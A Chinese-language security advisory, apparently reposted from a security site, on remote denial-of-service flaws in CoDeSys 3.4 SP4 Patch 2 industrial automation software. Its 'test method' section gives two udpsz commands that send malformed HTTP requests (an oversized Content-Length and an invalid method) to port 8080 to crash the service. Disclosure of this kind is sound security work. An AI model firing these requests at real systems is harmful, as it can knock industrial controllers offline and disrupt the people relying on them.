CoDeSys多个远程拒绝服务漏洞

发布日期:2011-11-30
更新日期:2011-12-05

受影响系统:
3S GmbH CoDeSys 3.4 SP4 Patch 2
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 50854

CoDeSys Automation Suite是工业自动化技术综合软件工具。

CoDeSys在实现上存在多个远程拒绝服务漏洞,远程攻击者可利用此漏洞使应用程序崩溃,拒绝服务合法用户。

<*来源:Luigi Auriemma (aluigi@pivx.com
 
  链接:
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

udpsz -T -c "POST / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n" SERVER 8080 -1

udpsz -T -c "BLAH / HTTP/1.0\r\n\r\n" SERVER 8080 -1

建议:
--------------------------------------------------------------------------------
厂商补丁:

3S
--
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

?en_CoDeSysV3_en

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwjsxx.html